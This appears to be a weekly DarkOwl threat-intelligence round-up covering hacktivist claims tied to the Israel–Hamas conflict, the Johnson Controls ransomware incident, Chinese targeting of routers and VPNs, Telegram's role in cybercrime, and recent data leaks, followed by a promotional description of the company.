Deep and Dark Web Round Up

Weekly Highlights

• For continuing DarkOwl/overall analysis of the conflict between Israel and Hamas, and what cyber efforts accompany this ongoing situation, please see the first section titled “Middle East Conflict”
• Johnson Controls conglomerate victim of ransomware, loses $27 million dollars and 27 TB of information
• China continues targeting US hardware, software
• Telegram continues to play a pivotal role in the cybercrime ecosystem
• Cyber Army Russia Reborn has overlap with Sandworm, demonstrates Russian proxy use

Middle East Conflict

Recent activities include Iranian and US officials calling for an immediate de-escalation after three US service members lost their lives in a drone attack this week. Continued claims of cyber-attacks and incidents against both Israel and Palestine continue online, as cyber actors use digital means to further their respective causes and beliefs:

• Hezbollah Brigades Secretary-General al-Hamidawi announces suspension of military operations against US assets in Syria and Iraq via Public Telegram Board - Both Iran and US officials called for activities that would reduce the escalation, avoid formal conflict/additional loss of life after three US soldiers were KIA
• Anonymous Sudan hacking group claimed it conducted a cyberattack targeting "critical parts" of healthcare infrastructure in Israel, adds "more than a thousand devices are completely disconnected."
• Terminator Security hacking group claims to have taken down Israeli Air Force servers

Malware/Ransomware

Johnson Controls company suffers ransomware attack

Industrial control systems and security equipment giant Johnson Controls was the victim of a ransomware attack with a detrimental cost of $27 million dollars. The offices located throughout Asia were the entry point for the malicious actors, who then spread through their entire corporate network; this event did negatively impact customer facing systems, in addition to the loss of 27 TB of corporate information.

China continues its presence in, war on, US hardware and networks

Chinese group Volt Tycoon’s continued targeting of small office/home office (SOHO) routers resulted in the FBI issuing advice to the SOHO manufacturers this week, in order to help eradicate the vulnerabilities.

Additionally, a separate Chinese government group has exploited CVE-2023-46805 and CVE-2024-21887 since December 2023 in their continued efforts to undermine US technology. The two exploits target VPNs. A patch was released January 26, 2024.

Both of these early 2024 activities follow CISA’s September 2023 caution that China’s group “BlackTech” used RATs and other malware extensively targeting router firmware in the US and Japan. 

Threat Actor Activity

Russian Market removed market sections titled “RDP” and “Dumps” from their platform. DarkOwl analysts will continue to track changes to this marketplace and provide updates accordingly. No motive or reason was publicly provided for the change to their platform.

Telegram continues to facilitate attacks with phishing/ransomware kits and malware sales

Telegram continues to play a critical role into the center of cybercrime. Not only does the messaging platform allow for trading tips on attacking, infiltrating, and compromising technical systems, but it allows for secure, hidden messages between actors and groups who play pivotal roles in geopolitical conflict(s).

“Cyber Army Russia Reborn” posts various databases, affiliations questioned

Advertising an Australian cab service database, a newly re-formed “Cyber Army Russia Reborn” (CARR) returned to the cybercrime scene. In January 2024, the group posted several other databases that didn’t match their typical targeting pattern. DarkOwl analysts will continue to monitor the actions of this group to determine their true affiliation and motives.

Notable Leaks and Breaches

• bolshayaperemena.online - (5,274,262 entries)
• Keenan warns 1.5 million people of data breach after summer cyberattack
• DHS employees jailed for stealing data of 200K U.S. govt workers

Suggested Further Reading

• CISA: Vendors must secure SOHO routers against Volt Typhoon attacks
• Italian Businesses Hit by Weaponized USBs Spreading Cryptojacking Malware
• Ars Technica used in malware campaign with never-before-seen obfuscation
• Online ransomware decryptor helps recover partially encrypted files
• A mishandled GitHub token exposed Mercedes-Benz source code
• Brazilian Feds Dismantle Grandoreiro Banking Trojan, Arresting Top Operatives

About DarkOwl

DarkOwl uses machine learning to collect automatically, continuously, and anonymously, index and rank darknet, deep web, and high-risk surface net data that allows for simplicity in searching.   

Our platform collects and stores data in near real-time, allowing darknet sites that frequently change location and availability, be queried in a safe and  secure manner without having to access the darknet itself. 

DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. As importantly, DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. Our passion, our focus, and our expertise is the darknet. 

For more information, visit www.darkowl.com.